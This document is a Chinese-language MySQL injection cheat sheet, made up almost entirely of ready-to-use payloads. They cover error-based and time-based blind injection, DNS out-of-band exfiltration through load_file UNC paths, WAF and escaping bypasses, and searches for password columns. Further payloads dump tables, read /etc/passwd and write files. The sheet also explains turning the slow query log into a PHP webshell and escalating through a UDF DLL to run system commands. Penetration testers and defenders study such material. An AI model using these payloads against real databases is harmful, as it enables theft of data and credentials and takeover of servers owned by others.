MySQL 注入备忘录
MySQL 注入技术全面指南
1. MySQL 注入基础
1.1 检测POC
错误注入POC
extractvalue(1,0x214d79357131) # 0x214D79357131 == '!My5q1'，以 '!' 开头构成非法 XPath，报错信息中会回显该字符串
updatexml(1,0x214d79357131,1)
# 注意：两者都要求 MySQL ≥ 5.1；报错回显最多 32 个字符，读取长数据需配合 substr()/mid() 分段取
时间盲注POC
sleep(6)
benchmark(pow(10,9),md5(0))
# 注意：sleep() 和 benchmark() 会对注入语句命中的每一行各执行一次，语句返回多行时延时成倍放大；benchmark 是 CPU 密集型，耗时取决于服务器性能，10^9 次 md5 可能需要数分钟，探测时建议先从 10^7 起试
OOB带外数据POC
load_file('\\\\{host}1{parameter}.{dnslog}\\i') # Windows UNC路径
# 注意：仅对运行在 Windows 上的 MySQL 有效；需要 FILE 权限，且 @@secure_file_priv 为空（未限制）时才会发起 UNC 解析；DNS 单个标签最长 63 字节、整个域名不超过 253 字节，{parameter} 过长时需 hex 编码后截断分段外带
1.2 边界构造技术
'|{poc}|'
"||{poc}||"
{poc}If(0,1,{poc})
asc,{poc}asc,
If(0,1,{poc})all {poc},
{raw_number} PrOcEdUrE AnAlYsE(eXTraCTvaLUe(1,{poc}),1)  # PROCEDURE ANALYSE 已在 MySQL 8.0 移除，仅适用于 ≤ 5.7
(SeLEcT!{poc})
{raw_string}|{poc}{raw_string}`|{poc}|`
1.3 宽字节注入
\x81'|{poc}#
\x81'|{poc})#
\x81'|{poc}))#
\x81"|{poc}#
\x81"|{poc})#
# 原理：连接字符集为 GBK 等多字节编码时，addslashes/mysql_escape_string 把引号转义成 \'（0x5c 0x27），前置的 0x81 与 0x5c 组成一个合法的双字节字符，反斜杠被"吃掉"，引号重新生效；连接字符集为 utf8mb4、或使用 mysql_set_charset/预编译语句时无效
2. WAF绕过技术
2.1 注释绕过
SELECT/*!19999(table_name*//*!19999)a*/FROM(select!0)t/*!19999,*//*!19999information_schema*//*!19999.*//*!19999tables*/
SELECT{a(table_name)}FROM{x(/*!19999information_schema*//*!19999.*//*!19999tables*/)}
select++++/*xxx*/++user()#
# 说明：/*!NNNNN ... */ 中的内容只在服务器版本 ≥ N.NN.NN 时执行，19999 即 1.99.99，任何现行版本都会执行；select!0 等价于 select NOT 0；{a(...)} 是 ODBC 转义语法，MySQL 会当作普通表达式解析
2.2 注释符变种
SELECT 1, 2, 3/*!12345UNION SELECT 4, 5, 6*/;
SELECT 1, 2, 3/*!UNION SELECT 4, 5, 6*/;
SELECT 1#comment;
SELECT 1-- comment;
SELECT/*comment*/1;
2.3 空白字符替代
%09 %0A %0B %0C %0D %20
3. 信息收集技术
3.1 当前SQL查询
SELECT INFO FROM information_schema.PROCESSLIST WHERE INFO LIKE '%673245283%' LIMIT 1
SELECT SUBSTRING_INDEX(INFO,{prefix},1) FROM information_schema.PROCESSLIST WHERE INFO LIKE '%673245283%'
SELECT SUBSTRING_INDEX(INFO,{suffix},-1) FROM information_schema.PROCESSLIST WHERE INFO LIKE '%673245283%'
# 说明：PROCESSLIST 需带 information_schema 前缀，否则只有当前库恰好是 information_schema 时才能解析；673245283 只是随机标记，把它放进当前注入语句里即可让查询命中自身这一行，从而拿到完整的原始 SQL；{prefix}/{suffix} 需写成字符串或 0x 十六进制；没有 PROCESS 权限时只能看到当前连接自己的线程
3.2 系统信息收集
SELECT concat_ws(0x0a,ifnull(@@secure_file_priv,0),
concat_ws(0x3a, @@version, @@version_compile_os, @@version_compile_machine, @@version_comment),
concat_ws(0x3a, @@hostname, @@port),
concat_ws(0x3a, user(), current_user(), database()),
concat_ws(0x3a, @@datadir, @@plugin_dir, @@tmpdir, @@basedir))
# 说明：concat_ws 会直接跳过 NULL 参数，所以 secure_file_priv 用 ifnull 包一层以区分"NULL"和"空字符串"；secure_file_priv 为 NULL 表示 load_file/INTO OUTFILE 全部禁用，为空字符串表示不限制，为目录则只允许该目录（5.7.6 起默认不再为空）；current_user() 才是实际鉴权的账号，与 user() 可能不同，后续查权限以它为准
3.3 权限检查
SELECT (SELECT super_priv FROM mysql.user WHERE CONCAT(user,0x40,host)=CURRENT_USER() LIMIT 1)='Y'
SELECT super_priv,file_priv FROM mysql.user WHERE user={user} AND host={host} LIMIT 1
# 说明：用 CURRENT_USER() 而不是 user()，前者才是实际鉴权的账号；mysql.user 以 user+host 为主键，不带 host 条件时 LIMIT 1 可能取到同名但不同 host 的另一条记录。文件读写看 file_priv，改 global 变量看 super_priv（8.0 起可能是 SYSTEM_VARIABLES_ADMIN 动态权限，不在 super_priv 列中）
# 读不了 mysql.user 时改查 information_schema（任意账号都能看到自身权限，含 8.0 的动态权限）：
SELECT group_concat(privilege_type) FROM information_schema.user_privileges WHERE grantee=CONCAT(0x27,REPLACE(CURRENT_USER(),0x40,0x274027),0x27)
4. 数据枚举技术
4.1 搜索敏感列
SELECT table_schema,table_name,column_name FROM information_schema.columns
WHERE column_name RLIKE 'password|passwd|pwd'
SELECT group_concat(concat_ws(0x2c,table_schema,table_name,column_name) separator 0x0a)
FROM (SELECT * FROM information_schema.columns WHERE column_name RLIKE 'password|passwd|pwd' LIMIT 0,5)t
# 注意：group_concat 受 group_concat_max_len 限制（默认 1024 字节），超长结果会被静默截断，堆叠注入可用时可先 SET SESSION group_concat_max_len=... 放宽（会话级，无需特权），否则靠 LIMIT 翻页；information_schema.columns 只列出当前账号有权限的库表
4.2 列信息枚举
SELECT column_name,column_type,is_nullable FROM information_schema.columns
WHERE table_schema={db} AND table_name={table} LIMIT 0,5
SELECT group_concat(concat_ws(0x2c,column_name,column_type,is_nullable) separator 0x0a)
FROM (SELECT * FROM information_schema.columns WHERE table_schema={db} AND table_name={table} LIMIT 0,5)t
4.3 数据导出
SELECT {column1},{column2},{column3} FROM {table} WHERE 1=1 LIMIT 0,5
SELECT group_concat(concat_ws('1qAZ',ifnull({column1},0x20),ifnull({column2},0x20),ifnull({column3},0x20)) separator '2wSX')
FROM (SELECT * FROM {table} WHERE 1=1 LIMIT 0,5)t
5. 文件操作技术
5.1 文件读取
SELECT load_file('/etc/passwd')
SELECT hex(load_file('/etc/passwd'))
SELECT CONVERT(LOAD_FILE('/etc/passwd') USING utf8)
# 前提：需要 FILE 权限、@@secure_file_priv 允许该路径、文件对 mysqld 运行账号可读，且文件大小不超过 max_allowed_packet；任一条件不满足时 load_file 静默返回 NULL 而不报错，先 SELECT @@secure_file_priv 确认
CREATE TABLE tmp_blob(tmp BLOB);
LOAD DATA INFILE 'C:\\tools\\tmp\\1.txt' INTO TABLE tmp_blob;
select tmp from tmp_blob;
# LOAD DATA INFILE 读的是服务器本地文件（同样受 FILE 权限和 secure_file_priv 约束），需要堆叠注入；用完 DROP TABLE tmp_blob 清理
5.2 文件写入
SELECT null,0x3eff3e,null INTO OUTFILE 'C:\\tools\\tmp\\8.txt'
FIELDS TERMINATED BY '' LINES TERMINATED BY ''
SELECT null,0x3eff3e,null INTO DUMPFILE 'C:\\tools\\tmp\\8.txt'
# 说明：写文件同样要求 FILE 权限且路径在 @@secure_file_priv 允许范围内，目标文件已存在时直接报错不覆盖；文件以 mysqld 运行账号创建，目录需对其可写。OUTFILE 即使 TERMINATED BY '' 仍会按 ESCAPED BY 规则转义 \ 和 NUL，写二进制（DLL/so）必须用 DUMPFILE；DUMPFILE 只写一行、不做任何转义。0x3eff3e 只是占位内容，按需替换成实际 payload 的 hex
5.3 日志文件利用
set global slow_query_log_file='/var/www/api_test.php';
set global slow_query_log=1;
SELECT 'xxxx', sleep(@@long_query_time+1)
# 说明：修改 global 变量需要 SUPER（8.0 起为 SYSTEM_VARIABLES_ADMIN）且需堆叠注入；日志文件由 mysqld 进程创建，目标目录需对其可写；@@log_output 须包含 FILE（默认如此）。改前先 SELECT @@slow_query_log_file,@@slow_query_log 记录原值，事后改回，否则之后所有慢查询都会持续写入该 php 文件。同理可用 @@general_log/@@general_log_file，任意语句都会被记录，无需等待 long_query_time
6. 命令执行技术
6.1 UDF提权条件
- MySQL版本≥5.1:udf文件必须放置于lib\plugin目录（即 @@plugin_dir 所指目录，实际路径以 SELECT @@plugin_dir 为准）
- MySQL版本<5.1:Windows2003下放置于c:\windows\system32,Windows2000下放置于c:\winnt\system32
- 通用前提：需要 FILE 权限与堆叠注入；@@secure_file_priv 必须允许写入 plugin 目录（较新版本默认配置通常不允许）；DLL/so 的位数要与 mysqld 进程一致（用 @@version_compile_machine 判断），库中导出的函数名必须与 CREATE FUNCTION 的名字一致，较新版本还要求库导出 xxx_init/xxx_deinit 之一，否则报 Can't find symbol
6.2 UDF提权步骤
SELECT @@plugin_dir
select 1 into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'
select 1 into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'
# 上面两句利用 NTFS 的 ::$INDEX_ALLOCATION 数据流在目录不存在时创建目录（仅 Windows/NTFS），路径按 @@plugin_dir 的实际值替换
SELECT 0xffff INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll'
# 0xffff 是占位符，实际写入时换成整个 DLL 的十六进制内容（语句总长受 max_allowed_packet 限制）
create function runsh returns string soname 'udf.dll';
select runsh('whoami');
drop function runsh;
# 用完 DROP FUNCTION 并删除 plugin 目录下的 udf.dll；runsh 与 soname 需与 DLL 实际导出的符号/文件名对应
7. 高级注入技术
7.1 错误注入技术
SELECT * FROM information_schema.tables WHERE 1=1 AND
(SELECT 1 FROM (SELECT MIN(1),CONCAT(({payload}), RAND(98)>0.5)x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a limit 1)
# floor/rand 重复键报错：依赖 GROUP BY 临时表产生 Duplicate entry，要求外层表有多行；{payload} 结果过长时错误信息会被截断
SELECT * FROM information_schema.tables WHERE 1=1 AND
LineString((select 1 from (select * from ({payload})a)b))
# 几何函数报错：仅 5.5–5.7 可用，8.0 已不再在错误信息中回显表达式内容
SELECT * FROM information_schema.tables WHERE 1=1 AND
ExtractValue(1, concat(0x2a, ({payload})))
# MySQL ≥ 5.1，回显最多 32 字符（前导 0x2a 占 1 个），长数据需 substr 分段
SELECT * FROM information_schema.tables WHERE 1=1 AND
GTID_SUBSET(({payload}),1)
# MySQL ≥ 5.6，错误信息 Malformed GTID set specification 中回显 {payload}
SELECT * FROM information_schema.tables WHERE 1=1 AND
json_keys(concat(0x2a, ({payload})))
# MySQL ≥ 5.7.8（JSON 支持），是否在 Invalid JSON text 错误中回显内容因版本而异，先用 version() 确认
SELECT * FROM information_schema.tables WHERE 1=1 AND
exp(~1+(select * from ({payload})a))
# DOUBLE 溢出报错：5.5.5 之后的旧版本可用，较新版本已修复、不再回显子查询内容；{payload} 必须是单列单行子查询
7.2 时间盲注
sleep(5)
benchmark(pow(10,8),md5(0))
('xxxxxxxxxxxx' rlike '((((x+y')
('xxxxxxxxxxxx' regexp '((((x+y')
(select-count(*)from`information_schema`.columns`1`,`information_schema`.columns`2`,`information_schema`.columns`3`,`information_schema`.columns`4`)
# 说明：后三种是 sleep/benchmark 被拦截时的替代。rlike/regexp 正则回溯延时只对 5.x 有效，8.0 改用 ICU 引擎并有 regexp_time_limit（默认 32ms）保护，基本不再延时；笛卡尔积延时随 information_schema.columns 行数按 4 次方增长，大库上可能长时间占用服务器，应先用较少的表数试探。所有延时 payload 都会对命中的每一行执行一次
7.3 二次注入
sleep(5)'|sleep(5)|'
"|sleep(5)|"
benchmark(pow(10,8),md5(0))'|benchmark(pow(10,8),md5(0))|'
8. 实用备忘录
8.1 常用函数
CAST({expr} AS NCHAR)
CONVERT({expr} ,NCHAR)
LENGTH({str})
CHAR_LENGTH({str})
IFNULL({expr},' ')
MID({str},{pos},{len})
CONCAT({str1},{str2},...)
CONCAT_WS({sep},{str1},{str2},...)
GROUP_CONCAT([DISTINCT] expr [,expr ...] [ORDER BY {unsigned_integer col_name}])
IF({expr1}, {expr2}, {expr3})
CASE WHEN {expr1} THEN {expr2} ELSE {expr3} END
HEX({str})
8.2 加密函数
HEX('abc')
UNHEX('616263')
TO_BASE64('abc')
FROM_BASE64('YWJj')  # 'abc' 的 base64 是 YWJj（原文 JWJj 解码后为 %bc）；两函数均需 MySQL ≥ 5.6.1
COMPRESS('abc')
UNCOMPRESS(COMPRESS('abc'))
ENCODE('abcdef', 'pass')
DECODE(ENCODE('abcdef', 'pass'), 'pass')
# ENCODE/DECODE 已在 MySQL 8.0 移除（5.7 起标记废弃），仅用于旧版本
AES_ENCRYPT('abcdef', 'pass')
AES_DECRYPT(AES_ENCRYPT('abcdef', 'pass'), 'pass')
# AES_ENCRYPT 的模式由 @@block_encryption_mode 决定，默认 aes-128-ecb；在另一端解密时需使用相同模式
8.3 系统变量
@@secure_file_priv
@@version
@@version_compile_os
@@version_compile_machine
@@version_comment
@@hostname
@@port
@@datadir
@@plugin_dir
@@tmpdir
@@basedir
@@slow_query_log
@@slow_query_log_file
@@long_query_time
@@log_error
@@general_log
@@general_log_file